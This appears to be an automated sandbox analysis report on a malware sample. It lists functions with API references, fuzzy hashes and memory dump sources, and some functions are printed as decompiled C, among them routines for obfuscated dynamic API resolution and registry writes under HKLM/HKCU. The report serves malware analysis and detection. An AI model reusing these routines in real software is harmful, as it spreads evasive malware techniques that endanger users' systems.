Instruction Fuzzy Hash: E2016D3190051AABCF059FE4C954AEDBB7AAF85728F184909D4106B2C0DF709A058BA2

Uniqueness

Uniqueness Score: -1.00%

Function 012B1A9C, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 012B1AF6
SysAllocString.OLEAUT32(0070006F), ref: 012B1B0A
SysAllocString.OLEAUT32(00000000), ref: 012B1B1C
SysFreeString.OLEAUT32(00000000), ref: 012B1B84
SysFreeString.OLEAUT32(00000000), ref: 012B1B93
SysFreeString.OLEAUT32(00000000), ref: 012B1B9E

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 46581036e7c0c22033d2ae860713d3e31c545291edd916560e48b82ead7354b6
Instruction ID: b78090c65ce350631ab72f38e5a0eb150729fac086876d7beb0fdc28ec564db3
Opcode Fuzzy Hash: 46581036e7c0c22033d2ae860713d3e31c545291edd916560e48b82ead7354b6
Instruction Fuzzy Hash: C2417F32D1060AAFDB01DFBCD884AEFBBB9EF49350F144426EA10EB110EA719915CB91

Uniqueness

Uniqueness Score: -1.00%

Function 012B4837, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B4837(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E012B75F6(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x12bd2e0; // 0x3f8a5a8
					_t1 = _t23 + 0x12be11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x12bd2e0; // 0x3f8a5a8
					_t2 = _t26 + 0x12be782; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E012B4AAB(_t54);
					} else {
						_t30 =  *0x12bd2e0; // 0x3f8a5a8
						_t5 = _t30 + 0x12be76f; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x12bd2e0; // 0x3f8a5a8
							_t7 = _t33 + 0x12be4ce; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x12bd2e0; // 0x3f8a5a8
								_t9 = _t36 + 0x12be406; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x12bd2e0; // 0x3f8a5a8
									_t11 = _t39 + 0x12be792; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E012B9269(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x012b4846
0x012b484a
0x012b490c
0x012b4850
0x012b4850
0x012b4855
0x012b4868
0x012b486a
0x012b486f
0x012b4877
0x012b487e
0x012b4880
0x012b4885
0x012b4904
0x012b4905
0x012b4887
0x012b4887
0x012b488c
0x012b4894
0x012b4896
0x012b489b
0x00000000
0x012b489d
0x012b489d
0x012b48a2
0x012b48aa
0x012b48ac
0x012b48b1
0x00000000
0x012b48b3
0x012b48b3
0x012b48b8
0x012b48c0
0x012b48c2
0x012b48c7
0x00000000
0x012b48c9
0x012b48c9
0x012b48ce
0x012b48d6
0x012b48d8
0x012b48dd
0x00000000
0x012b48df
0x012b48e5
0x012b48ea
0x012b48f1
0x012b48f6
0x012b48fb
0x00000000
0x012b48fd
0x012b4900
0x012b4900
0x012b48fb
0x012b48dd
0x012b48c7
0x012b48b1
0x012b489b
0x012b4885
0x012b491a

APIs

Part of subcall function 012B75F6: RtlAllocateHeap.NTDLL(00000000,00000000,012B4F70), ref: 012B7602

GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,012B101C,?,00000001,?,?,00000000,00000000), ref: 012B485C
GetProcAddress.KERNEL32(00000000,7243775A), ref: 012B487E
GetProcAddress.KERNEL32(00000000,614D775A), ref: 012B4894
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 012B48AA
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 012B48C0
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 012B48D6

Part of subcall function 012B9269: memset.NTDLL ref: 012B92E8

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: d80e17d45f6c9953bf4337d679d21c14737bcb5e54840289ad993b0a2ef549e5
Instruction ID: 50c68f877af9137c46d4e41adf3fedc21e5b831eeedfc6dc2d7721819eaa18e5
Opcode Fuzzy Hash: d80e17d45f6c9953bf4337d679d21c14737bcb5e54840289ad993b0a2ef549e5
Instruction Fuzzy Hash: 762132B151068BAFDB20EFA9D9C8DEA77ECEF043947014425E656C7212DB74FA05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6ED0E16B, Relevance: 9.1, APIs: 6, Instructions: 78COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6ED0E172
_Maklocstr.LIBCPMT ref: 6ED0E1DB
_Maklocstr.LIBCPMT ref: 6ED0E1ED
_Maklocchr.LIBCPMT ref: 6ED0E205
_Maklocchr.LIBCPMT ref: 6ED0E215
_Getvals.LIBCPMT ref: 6ED0E237

Part of subcall function 6ED0688C: _Maklocchr.LIBCPMT ref: 6ED068BB
Part of subcall function 6ED0688C: _Maklocchr.LIBCPMT ref: 6ED068D1

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
String ID:
API String ID: 3549167292-0
Opcode ID: adfdfd2f020a5cc4b079e084c1a894e8dea13a0752e3e5cce7cb128efbb10f28
Instruction ID: a92b7b17b26ff5cdb26924c7a6e91ccb782cf978d80872306094d73948277b7d
Opcode Fuzzy Hash: adfdfd2f020a5cc4b079e084c1a894e8dea13a0752e3e5cce7cb128efbb10f28
Instruction Fuzzy Hash: DB213D71D00218AADF14EFE5D844ACF7BACEF05714F04885AF9199F285EB709644CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED074E4, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED074EB
std::_Lockit::_Lockit.LIBCPMT ref: 6ED074F5
int.LIBCPMT ref: 6ED0750C

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

std::_Facet_Register.LIBCPMT ref: 6ED07546
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED07566
Concurrency::cancel_current_task.LIBCPMT ref: 6ED07573

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 8c3e069e060a26826c9ccd5faf0f279c5ef40bd2214ef0ee21af737ff2fa2501
Instruction ID: 5e6c9f6a940994c088300341f75541378beeeb2d77dbb543bfc84697e917fe7b
Opcode Fuzzy Hash: 8c3e069e060a26826c9ccd5faf0f279c5ef40bd2214ef0ee21af737ff2fa2501
Instruction Fuzzy Hash: B701843190451ADBCF05DFE4D988AED777A7F85328F180909D4116B3D0DF70DA058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED0744F, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED07456
std::_Lockit::_Lockit.LIBCPMT ref: 6ED07460
int.LIBCPMT ref: 6ED07477

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

std::_Facet_Register.LIBCPMT ref: 6ED074B1
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED074D1
Concurrency::cancel_current_task.LIBCPMT ref: 6ED074DE

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 28ca382580d1dedc90a5bbbf83f9b47d36bf8a8a482c5a00443a9cdfee2ee52c
Instruction ID: 5de2c85203e0b00529765fae82377488c1533ec2254163b7a230a8cb58003d3f
Opcode Fuzzy Hash: 28ca382580d1dedc90a5bbbf83f9b47d36bf8a8a482c5a00443a9cdfee2ee52c
Instruction Fuzzy Hash: 9201AD3190462AAFCB05DFE4C954AED7B7AAF81728F280819E4106B2C0DF70DA058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED07C75, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED07C7C
std::_Lockit::_Lockit.LIBCPMT ref: 6ED07C86
int.LIBCPMT ref: 6ED07C9D

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

std::_Facet_Register.LIBCPMT ref: 6ED07CD7
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED07CF7
Concurrency::cancel_current_task.LIBCPMT ref: 6ED07D04

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 6667429d0903dc411fad867c9ffea50927e7ef9d84ce38aa5ab4b86a3979ade8
Instruction ID: d5ab7edc0eb2a641a6669fff37fbdb81d6b9c6737d5ee959721e527180a002f0
Opcode Fuzzy Hash: 6667429d0903dc411fad867c9ffea50927e7ef9d84ce38aa5ab4b86a3979ade8
Instruction Fuzzy Hash: 0601C03590461AEFCF05DFE4C945AEE7779AF85328F280809D8206B3C0DF709A458BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED01C01, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED01C08
std::_Lockit::_Lockit.LIBCPMT ref: 6ED01C12
int.LIBCPMT ref: 6ED01C29

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

std::_Facet_Register.LIBCPMT ref: 6ED01C63
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED01C83
Concurrency::cancel_current_task.LIBCPMT ref: 6ED01C90

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 48efc32af05d5af51145ddcf3db00cdcd2ff8f22faa9cc287c79104f8a99a079
Instruction ID: c5d16d25d555e4f6413b19d0eefa784e63192304cbd32443f19cc292a899c917
Opcode Fuzzy Hash: 48efc32af05d5af51145ddcf3db00cdcd2ff8f22faa9cc287c79104f8a99a079
Instruction Fuzzy Hash: 8201C03190052A9BCF45CFE0C984AEEB779AF8536CF180919E4106B2C0DF70DA098BA5

Uniqueness

Uniqueness Score: -1.00%

Function 6ED07579, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED07580
std::_Lockit::_Lockit.LIBCPMT ref: 6ED0758A
int.LIBCPMT ref: 6ED075A1

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

std::_Facet_Register.LIBCPMT ref: 6ED075DB
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED075FB
Concurrency::cancel_current_task.LIBCPMT ref: 6ED07608

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 3492ac73eead1a0c346c7aec3653b88b7987e2c45f8b9d3d768375d0944c588c
Instruction ID: 59fe495e7044e149540e1557e16466f8b9ac91efe059b503ed9428e95f846a01
Opcode Fuzzy Hash: 3492ac73eead1a0c346c7aec3653b88b7987e2c45f8b9d3d768375d0944c588c
Instruction Fuzzy Hash: 9C01803190051A9FCF06DFE4C949AEEB77ABF85328F184919D4216B3D0DF74DA058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED07D0A, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED07D11
std::_Lockit::_Lockit.LIBCPMT ref: 6ED07D1B
int.LIBCPMT ref: 6ED07D32

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

std::_Facet_Register.LIBCPMT ref: 6ED07D6C
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED07D8C
Concurrency::cancel_current_task.LIBCPMT ref: 6ED07D99

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: a288284caead9de523f0d5a7d7e9049e8bd14e21474313b095993dfdffd83572
Instruction ID: e6c90d1112adf2f01535caf00a0c6a925ca39c50107c715bbc5205cd49f922a2
Opcode Fuzzy Hash: a288284caead9de523f0d5a7d7e9049e8bd14e21474313b095993dfdffd83572
Instruction Fuzzy Hash: 2C016D7590051AEBCB05DFE4C954AFDB779BF85328F280909D4116B2D0DB709A058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED07A21, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED07A28
std::_Lockit::_Lockit.LIBCPMT ref: 6ED07A32
int.LIBCPMT ref: 6ED07A49

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

std::_Facet_Register.LIBCPMT ref: 6ED07A83
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED07AA3
Concurrency::cancel_current_task.LIBCPMT ref: 6ED07AB0

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 016d6cf9657cdc7e6cdc3737bfedb7dc39aca801eada08c1944720c54733677f
Instruction ID: 62ce9de0cce421fc3a37ec9c3b0ebee18cdb4721b0a0fb3418dcb9dfb7a372af
Opcode Fuzzy Hash: 016d6cf9657cdc7e6cdc3737bfedb7dc39aca801eada08c1944720c54733677f
Instruction Fuzzy Hash: 9301C03190461AAFCF05DFE4C984AEE777AAF81728F280909E4156B3C0DF709A058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED07BE0, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED07BE7
std::_Lockit::_Lockit.LIBCPMT ref: 6ED07BF1
int.LIBCPMT ref: 6ED07C08

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

std::_Facet_Register.LIBCPMT ref: 6ED07C42
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED07C62
Concurrency::cancel_current_task.LIBCPMT ref: 6ED07C6F

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 1c702698e08f2b57fcbebe266190a955dca8388937d673b6daf59a8681d44945
Instruction ID: de6b204bce352f29ca8f92de1a23f47a9605702525d3b23e8bc01161dcff4153
Opcode Fuzzy Hash: 1c702698e08f2b57fcbebe266190a955dca8388937d673b6daf59a8681d44945
Instruction Fuzzy Hash: 0F01C03190051AAFCF05EFE4C984AEE77BAAF85318F180909D4106B3C0DF71DE058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED073BA, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED073C1
std::_Lockit::_Lockit.LIBCPMT ref: 6ED073CB
int.LIBCPMT ref: 6ED073E2

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

std::_Facet_Register.LIBCPMT ref: 6ED0741C
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED0743C
Concurrency::cancel_current_task.LIBCPMT ref: 6ED07449

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 4d2c9a1df481521445afc7e2c58b13ca3169bb4c0dcde2a38e9a79f4990fd3b8
Instruction ID: 3b98ef6b10703a34829ff357ec43130a4ed642e2411b65bb15ba53345dfac30e
Opcode Fuzzy Hash: 4d2c9a1df481521445afc7e2c58b13ca3169bb4c0dcde2a38e9a79f4990fd3b8
Instruction Fuzzy Hash: 2D01C07190051AEFCF05DFE4C944AEE7B7AAF8132CF284809D4106B2D0DF70DA069BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED01B6C, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED01B73
std::_Lockit::_Lockit.LIBCPMT ref: 6ED01B7D
int.LIBCPMT ref: 6ED01B94

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

std::_Facet_Register.LIBCPMT ref: 6ED01BCE
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED01BEE
Concurrency::cancel_current_task.LIBCPMT ref: 6ED01BFB

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: ddfc998cc1934e4ef649520564ed914a9f32502255647610865bc95b1dd000c1
Instruction ID: 21711d0af93ac044845c04a90e35331edb952ea6d3852fc0128b82b39e0ca83b
Opcode Fuzzy Hash: ddfc998cc1934e4ef649520564ed914a9f32502255647610865bc95b1dd000c1
Instruction Fuzzy Hash: EC01C03190451A9FCF05DFE4CA94AEE7779AF8131CF184909E4106B3C0EF70DA0A9BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED07862, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED07869
std::_Lockit::_Lockit.LIBCPMT ref: 6ED07873
int.LIBCPMT ref: 6ED0788A

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

std::_Facet_Register.LIBCPMT ref: 6ED078C4
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED078E4
Concurrency::cancel_current_task.LIBCPMT ref: 6ED078F1

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 7ed3ab0b34d80fa0af8fc9b20246fcefec9105ac74f7448fca8c457aa32f0be3
Instruction ID: cd5a68cb352b2ed020119e0e1580a80e8d746f5a0a16c5e1fcab0b118c66de47
Opcode Fuzzy Hash: 7ed3ab0b34d80fa0af8fc9b20246fcefec9105ac74f7448fca8c457aa32f0be3
Instruction Fuzzy Hash: 21016D31D0061AABCF05DFE4C994AED7779AF85728F280909D4116F3D0DB749A45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED0798C, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED07993
std::_Lockit::_Lockit.LIBCPMT ref: 6ED0799D
int.LIBCPMT ref: 6ED079B4

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

std::_Facet_Register.LIBCPMT ref: 6ED079EE
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED07A0E
Concurrency::cancel_current_task.LIBCPMT ref: 6ED07A1B

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: f4b9e7e92d71c45a61d293261c2673d8a46e5160bcfad0487459b50dc1314164
Instruction ID: 6620aebc337d8f0a08d5e91acf4f28eb719744be1799038c05bf1a4fb9172137
Opcode Fuzzy Hash: f4b9e7e92d71c45a61d293261c2673d8a46e5160bcfad0487459b50dc1314164
Instruction Fuzzy Hash: 8F01AD7190051AABCF05DFE4C944AEE7B79AF81728F184C09E4106B2C0DB70DA058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 012B282B, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E012B282B(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x12bd37c);
					_t91 = 0x80000002;
					L6:
					_t59 = E012B1922( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E012B5C6E(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E012B4AAB(_a8);
						goto L29;
					}
					_t64 =  *0x12bd2b0; // 0x5249b38
					_t16 = _t64 + 0xc; // 0x5249c06
					_t65 = E012B1922(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d012bc0
						if(E012B4A6D(_t97,  *_t33, _t91, _a8,  *0x12bd374,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x12bd2e0; // 0x3f8a5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x12bea48; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x12bea43; // 0x55434b48
								_t69 = _t34;
							}
							if(E012B5F64(_t69,  *0x12bd374,  *0x12bd378,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x12bd2e0; // 0x3f8a5a8
									_t44 = _t71 + 0x12be83e; // 0x74666f53
									_t73 = E012B1922(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d012bc0
										E012B5DDA( *_t47, _t91, _a8,  *0x12bd378, _a24);
										_t49 = _t101 + 0x10; // 0x3d012bc0
										E012B5DDA( *_t49, _t91, _t99,  *0x12bd370, _a16);
										E012B4AAB(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d012bc0
									E012B5DDA( *_t40, _t91, _a8,  *0x12bd378, _a24);
									_t43 = _t101 + 0x10; // 0x3d012bc0
									E012B5DDA( *_t43, _t91, _a8,  *0x12bd370, _a16);
								}
								if( *_t101 != 0) {
									E012B4AAB(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d012bc0
					_t81 = E012B63F5( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d012bc0
							E012B4A6D(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E012B4AAB(_t100);
						_t98 = _a16;
					}
					E012B4AAB(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E012BA938(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x12bd37c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

0x012b282b
0x012b2834
0x012b283b
0x012b2840
0x012b28ad
0x012b28b3
0x012b28b8
0x012b28bf
0x012b28c4
0x012b28c9
0x012b2a34
0x012b2a3b
0x012b2a3b
0x012b2a40
0x012b2a42
0x012b2a42
0x012b2a4b
0x012b2a4b
0x012b28cf
0x012b28db
0x012b2a2a
0x012b2a2d
0x00000000
0x012b2a2d
0x012b28e1
0x012b28e6
0x012b28e9
0x012b28ee
0x012b28f3
0x012b293c
0x012b293c
0x012b294f
0x012b2959
0x012b295f
0x012b2966
0x012b2970
0x012b2970
0x012b2968
0x012b2968
0x012b2968
0x012b2968
0x012b2992
0x012b299a
0x012b29c8
0x012b29cd
0x012b29d4
0x012b29d9
0x012b29dd
0x012b2a0f
0x012b29df
0x012b29ec
0x012b29ef
0x012b29ff
0x012b2a02
0x012b2a08
0x012b2a08
0x012b299c
0x012b29a9
0x012b29ac
0x012b29be
0x012b29c1
0x012b29c1
0x012b2a19
0x012b2a25
0x012b2a1b
0x012b2a1e
0x012b2a1e
0x012b2a19
0x012b2992
0x00000000
0x012b2959
0x012b2902
0x012b2905
